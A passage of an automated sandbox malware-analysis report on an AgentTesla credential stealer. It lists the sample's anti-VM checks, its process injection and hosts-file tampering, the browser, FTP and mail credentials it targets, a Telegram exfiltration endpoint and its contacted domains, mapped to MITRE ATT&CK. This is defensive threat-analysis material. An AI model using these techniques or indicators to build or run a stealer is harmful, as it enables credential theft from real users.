              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000000.00000002.352877677.0000000002F42000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.352520521.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: swift copy.exe PID: 6028, type: MEMORY
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: swift copy.exe, 00000000.00000002.352877677.0000000002F42000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: swift copy.exe, 00000000.00000002.352877677.0000000002F42000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Source: C:\Users\user\Desktop\swift copy.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9483
              Source: C:\Users\user\Desktop\swift copy.exe TID: 776Thread sleep time: -51073s >= -30000s
              Source: C:\Users\user\Desktop\swift copy.exe TID: 4588Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6116Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 5944Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: swift copy.exe, 00000000.00000002.352877677.0000000002F42000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: RegSvcs.exe, 00000001.00000002.606210467.0000000005E20000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
              Source: swift copy.exe, 00000000.00000002.352877677.0000000002F42000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: swift copy.exe, 00000000.00000002.352877677.0000000002F42000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
              Source: RegSvcs.exe, 00000001.00000002.606210467.0000000005E20000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
              Source: RegSvcs.exe, 00000001.00000002.606210467.0000000005E20000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
              Source: RegSvcs.exe, 00000001.00000002.606061708.0000000005D4C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: swift copy.exe, 00000000.00000002.352877677.0000000002F42000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: RegSvcs.exe, 00000001.00000002.606210467.0000000005E20000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
              Source: C:\Users\user\Desktop\swift copy.exeProcess information queried: ProcessInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0613CCDE LdrInitializeThunk,KiUserExceptionDispatcher,KiUserExceptionDispatcher,
              Source: C:\Users\user\Desktop\swift copy.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\swift copy.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\swift copy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
              Modifies the hosts fileShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Writes to foreign memory regionsShow sources
              Source: C:\Users\user\Desktop\swift copy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
              Source: C:\Users\user\Desktop\swift copy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
              Source: C:\Users\user\Desktop\swift copy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000
              Source: C:\Users\user\Desktop\swift copy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000
              Source: C:\Users\user\Desktop\swift copy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A81008
              Source: C:\Users\user\Desktop\swift copy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: RegSvcs.exe, 00000001.00000002.601511388.00000000016C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: RegSvcs.exe, 00000001.00000002.601511388.00000000016C0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: RegSvcs.exe, 00000001.00000002.601511388.00000000016C0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
              Source: RegSvcs.exe, 00000001.00000002.601511388.00000000016C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\swift copy.exeQueries volume information: C:\Users\user\Desktop\swift copy.exe VolumeInformation
              Source: C:\Users\user\Desktop\swift copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\swift copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\swift copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\swift copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\swift copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06135594 GetUserNameW,
              Source: C:\Users\user\Desktop\swift copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings:

              barindex
              Modifies the hosts fileShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000001.00000002.599743364.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.602855902.0000000002FF8000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.602533410.0000000002FAF000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.354262247.0000000003D53000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4652, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: swift copy.exe PID: 6028, type: MEMORY
              Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: Yara matchFile source: 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4652, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000001.00000002.599743364.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.602855902.0000000002FF8000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.602533410.0000000002FAF000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.354262247.0000000003D53000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4652, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: swift copy.exe PID: 6028, type: MEMORY
              Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Process Injection212File and Directory Permissions Modification1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Disable or Modify Tools1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerSecurity Software Discovery211SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSVirtualization/Sandbox Evasion13Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion13DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 323804 Sample: swift copy.exe Startdate: 27/11/2020 Architecture: WINDOWS Score: 100 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 5 other signatures 2->49 6 swift copy.exe 3 2->6         started        10 kprUEGC.exe 2 2->10         started        12 kprUEGC.exe 1 2->12         started        process3 file4 23 C:\Users\user\AppData\...\swift copy.exe.log, ASCII 6->23 dropped 51 Writes to foreign memory regions 6->51 53 Injects a PE file into a foreign processes 6->53 14 RegSvcs.exe 17 4 6->14         started        19 conhost.exe 10->19         started        21 conhost.exe 12->21         started        signatures5 process6 dnsIp7 29 cglgumrukleme.com 78.142.210.93, 49718, 587 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi Turkey 14->29 31 mail.cglgumrukleme.com 14->31 33 3 other IPs or domains 14->33 25 C:\Users\user\AppData\Roaming\...\kprUEGC.exe, PE32 14->25 dropped 27 C:\Windows\System32\drivers\etc\hosts, ASCII 14->27 dropped 35 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->35 37 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->37 39 Tries to steal Mail credentials (via file access) 14->39 41 5 other signatures 14->41 file8 signatures9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              swift copy.exe31%VirustotalBrowse
              swift copy.exe56%ReversingLabsByteCode-MSIL.Trojan.NanoBot
              swift copy.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe0%MetadefenderBrowse
              C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe0%ReversingLabs

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              1.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

              Domains

              SourceDetectionScannerLabelLink
              cglgumrukleme.com0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://KGcFUsjPPNQUPKk.net0%Avira URL Cloudsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              http://cglgumrukleme.com0%VirustotalBrowse
              http://cglgumrukleme.com0%Avira URL Cloudsafe
              http://mail.cglgumrukleme.com0%Avira URL Cloudsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              http://KsvFwe.com0%Avira URL Cloudsafe
              http://crl.microsoft.0%URL Reputationsafe
              http://crl.microsoft.0%URL Reputationsafe
              http://crl.microsoft.0%URL Reputationsafe
              https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
              https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
              https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              elb097307-934924932.us-east-1.elb.amazonaws.com
              23.21.42.25
              truefalse
                high
                cglgumrukleme.com
                78.142.210.93
                truetrueunknown
                mail.cglgumrukleme.com
                unknown
                unknowntrue
                  unknown
                  api.ipify.org
                  unknown
                  unknownfalse
                    high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpfalse
                      high
                      http://127.0.0.1:HTTP/1.1RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://api.ipify.orgRegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpfalse
                        high
                        http://DynDns.comDynDNSRegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://KGcFUsjPPNQUPKk.netRegSvcs.exe, 00000001.00000002.602855902.0000000002FF8000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://cglgumrukleme.comRegSvcs.exe, 00000001.00000002.602975649.000000000301E000.00000004.00000001.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.telegram.org/bot%telegramapi%/swift copy.exe, 00000000.00000002.354262247.0000000003D53000.00000004.00000001.sdmp, RegSvcs.exe, 00000001.00000002.599743364.0000000000402000.00000040.00000001.sdmpfalse
                          high
                          http://mail.cglgumrukleme.comRegSvcs.exe, 00000001.00000002.602975649.000000000301E000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameswift copy.exe, 00000000.00000002.352520521.0000000002D01000.00000004.00000001.sdmp, RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpfalse
                            high
                            https://secure.comodo.com/CPS0RegSvcs.exe, 00000001.00000002.602105310.0000000002DAD000.00000004.00000001.sdmpfalse
                              high
                              https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xRegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpfalse
                                high
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipswift copy.exe, 00000000.00000002.354262247.0000000003D53000.00000004.00000001.sdmp, RegSvcs.exe, 00000001.00000002.599743364.0000000000402000.00000040.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://KsvFwe.comRegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
